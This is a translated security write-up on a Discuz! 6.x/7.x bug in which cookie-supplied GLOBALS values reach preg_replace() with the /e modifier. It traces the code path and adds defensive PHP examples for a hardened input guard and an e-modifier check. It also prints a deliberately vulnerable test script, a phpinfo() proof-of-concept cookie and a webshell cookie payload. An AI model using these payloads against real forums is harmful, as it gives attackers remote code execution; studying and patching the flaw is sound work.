Discuz! 6.x/7.x global variable defense bypass causes command execution

Source: Internet
Author: User
Tags: phpinfo

Reference: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html

File: include/discuzcode.func.php, lines 97-241, function discuzcode()

In the following line, $GLOBALS['_DCACHE']['smilies']['searcharray'] and $GLOBALS['_DCACHE']['smilies']['replacearray'] are passed straight to preg_replace() as the pattern and replacement arguments:

$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);

In PHP 5.3.x, however, the contents of the $_REQUEST superglobal depend on the request_order setting in php.ini. In the latest 5.3.x series request_order defaults to GP, so in the default configuration $_REQUEST contains only $_GET and $_POST, not $_COOKIE, and the GLOBALS variable can therefore be submitted through a cookie without being seen by a check on $_REQUEST. (The default is CGP in 5.3.29.)

For the demonstration below, request_order is set to GP.
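The dependency on request_order described above, as an added example (PHP 7+, not Discuz! code): a guard that only consults $_REQUEST for a GLOBALS key is modelled alongside one that inspects every input source directly, and both are run against a constructed cookie shaped like the one in this write-up. build_request(), legacy_guard(), hardened_guard() and request_includes_cookies() are names chosen here, not Discuz! functions.

```php
<?php
// Added example, not Discuz! code. Shows why a tainting check that only looks
// at $_REQUEST depends on php.ini's request_order, and a check that does not.

// Constructed model of how PHP fills $_REQUEST for a given request_order:
// sources are merged in the order given, later ones overwriting earlier keys.
function build_request(string $order, array $get, array $post, array $cookie): array
{
    $sources = ['G' => $get, 'P' => $post, 'C' => $cookie];
    $request = [];
    foreach (str_split(strtoupper($order)) as $letter) {
        if (isset($sources[$letter])) {
            $request = array_merge($request, $sources[$letter]);
        }
    }
    return $request;
}

// A guard of the style the write-up bypasses: only $_REQUEST is consulted.
function legacy_guard(array $request): bool
{
    return isset($request['GLOBALS']);
}

// Hardened guard: consult every input source directly, so the result is the
// same whatever request_order says, and refuse any key that names a superglobal.
function hardened_guard(array $get, array $post, array $cookie, array $files): bool
{
    $forbidden = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                  '_SERVER', '_ENV', '_FILES', '_SESSION'];
    foreach ([$get, $post, $cookie, $files] as $source) {
        foreach (array_keys($source) as $key) {
            if (in_array((string) $key, $forbidden, true)) {
                return true;
            }
        }
    }
    return false;
}

// Operator self-check: does this PHP's $_REQUEST include cookies at all?
// An empty request_order falls back to variables_order.
function request_includes_cookies(): bool
{
    $order = ini_get('request_order');
    if ($order === '' || $order === false) {
        $order = ini_get('variables_order');
    }
    return stripos((string) $order, 'C') !== false;
}

// Constructed request: PHP parses a cookie named GLOBALS[_DCACHE][smilies][searcharray]
// into exactly this nested array.
$get    = ['tid' => '13', 'extra' => 'page=1'];
$post   = [];
$cookie = ['GLOBALS' => ['_DCACHE' => ['smilies' => [
    'searcharray'  => ['/.*/eui'],
    'replacearray' => ['phpinfo();'],
]]]];
$files  = [];

foreach (['GP', 'CGP'] as $order) {
    $request = build_request($order, $get, $post, $cookie);
    printf("request_order=%-4s legacy guard fires: %s\n",
        $order, legacy_guard($request) ? 'yes' : 'NO (bypassed)');
}
printf("hardened guard fires: %s\n",
    hardened_guard($get, $post, $cookie, $files) ? 'yes' : 'no');
printf("this PHP's \$_REQUEST includes cookies: %s\n",
    request_includes_cookies() ? 'yes' : 'no');
```

With request_order=GP the legacy guard never sees the cookie and stays silent, while the hardened guard fires regardless of the ini setting; the same idea applies to any input-validation code that relies on $_REQUEST rather than on the individual superglobals.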

A textbook vulnerability: the first two parameters of preg_replace() are attacker-controlled. When the first parameter (the pattern) carries the /e modifier, the second parameter (the replacement) is evaluated as PHP code, which is enough to plant a backdoor.

One point to note: the delimiter does not have to be the / of /e. A quick script shows which characters work as the delimiter:

<?php
// Deliberately vulnerable test script: $_GET['a'] supplies the pattern delimiter
// on both sides, and the e modifier follows the closing delimiter.
preg_replace($_GET['a'] . '.*' . $_GET['a'] . 'e', 'phpinfo();', 'a', 1);
?>


Specifically, punctuation characters such as @, #, $, %, ^, &, *, (, ), - and + work, but escaping during transmission has to be taken into account.

Submitted via cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
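The two points just made, that any non-alphanumeric delimiter works and that e can be combined with other modifiers such as /.*/eui, are what a defensive check on the pattern has to handle. The following added example (PHP 7+, not Discuz! code) recovers the modifier suffix of a delimited PCRE pattern the way PHP's preg_* functions do, including bracket-style delimiters, and wraps preg_replace() so that any pattern carrying e is refused before it is executed. pattern_modifiers(), has_eval_modifier() and preg_replace_no_eval() are names chosen here; the sample patterns are constructed.

```php
<?php
// Added example, not Discuz! code. Parses PHP's delimited pattern syntax to find
// the modifiers and rejects the e modifier whatever delimiter is used.

// Return the modifier suffix of a pattern, or null if PHP would reject it.
function pattern_modifiers(string $pattern): ?string
{
    $p = ltrim($pattern);             // PHP skips leading whitespace before the delimiter
    if ($p === '') {
        return null;                  // empty pattern: PHP reports an error
    }
    $open = $p[0];
    if (ctype_alnum($open) || $open === '\\') {
        return null;                  // alphanumeric or backslash delimiters are refused
    }
    $pairs = ['(' => ')', '[' => ']', '{' => '}', '<' => '>'];
    $close = $pairs[$open] ?? $open;  // bracket-style delimiters close with their pair
    $depth = 1;
    $len = strlen($p);
    for ($i = 1; $i < $len; $i++) {
        $c = $p[$i];
        if ($c === '\\' && $i + 1 < $len) {
            $i++;                     // skip an escaped character
            continue;
        }
        if ($c === $close && --$depth === 0) {
            return substr($p, $i + 1);    // everything after the closing delimiter
        }
        if ($close !== $open && $c === $open) {
            $depth++;                 // nested bracket-style delimiter
        }
    }
    return null;                      // no closing delimiter: PHP reports an error
}

function has_eval_modifier(string $pattern): bool
{
    $mods = pattern_modifiers($pattern);
    return $mods !== null && strpos($mods, 'e') !== false;
}

// Guard for a call site like the one in discuzcode(): refuse any pattern that
// would evaluate its replacement, then defer to preg_replace() as before.
function preg_replace_no_eval($pattern, $replacement, string $subject, int $limit = -1): ?string
{
    foreach ((array) $pattern as $i => $one) {
        if (!is_string($one) || has_eval_modifier($one)) {
            throw new InvalidArgumentException("pattern #$i carries the e modifier; refusing to evaluate");
        }
    }
    return preg_replace($pattern, $replacement, $subject, $limit);
}

// Constructed samples, including the patterns used in the write-up.
$samples = ['/.*/eui', '#.*#e', '(.*)e', '@.*@ie', '/.*/ui', '{a{b}}i', 'abc', '/unterminated'];
foreach ($samples as $s) {
    $mods = pattern_modifiers($s);
    printf("%-15s modifiers=%-10s eval=%s\n", $s,
        $mods === null ? '(invalid)' : "'$mods'",
        has_eval_modifier($s) ? 'YES' : 'no');
}

try {
    echo preg_replace_no_eval(['/.*/eui'], ['phpinfo();'], 'hello'), "\n";
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), "\n";
}
// A literal smiley pattern of the kind the smilies cache is meant to hold passes through.
echo preg_replace_no_eval(['/:\)/'], ['<smiley>'], 'hi :)'), "\n";
```

The check matters on the PHP 5.x versions this write-up concerns; PHP 5.5 deprecated the e modifier and PHP 7.0 removed it, so on current PHP the pattern is simply an error. The more fundamental fix is to keep user input out of $GLOBALS in the first place, since smiley codes are literal strings and do not need a regex at all.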

The output is echoed wherever the discuzcode() function is called.

The viewthread_procpost() function occupies lines 619-729 of /viewthread.php.

discuzcode() is called on line 725:

$post['message'] = discuzcode($post['message'], $post['smileyoff'], $post['bbcodeoff'], $post['htmlon'] & 1, $forum['allowsmilies'], $forum['allowbbcode'], ($forum['allowimgcode'] && $showimages ? 1 : 0), $forum['allowhtml'], ($forum['jammer'] && $post['authorid'] != $discuz_uid ? 1 : 0), 0, $post['authorid'], $forum['allowmediacode'], $post['pid']);


viewthread_procpost() is in turn called from the loop over the posts of the thread:

while($post = $sdb->fetch_array($query)) {
    if(($onlyauthoradd && $post['anonymous'] == 0) || !$onlyauthoradd) {
        $postlist[$post['pid']] = viewthread_procpost($post);
    }
}

Back in /include/discuzcode.func.php, once $GLOBALS['_DCACHE']['smilies'] has a value, the branch containing preg_replace() is taken and the code executes:

if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) { ... }


POC: add the following to the cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

Then visiting any post, e.g. /viewthread.php?tid=13&extra=page%3D1, triggers the vulnerability.

Getting a shell: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3b
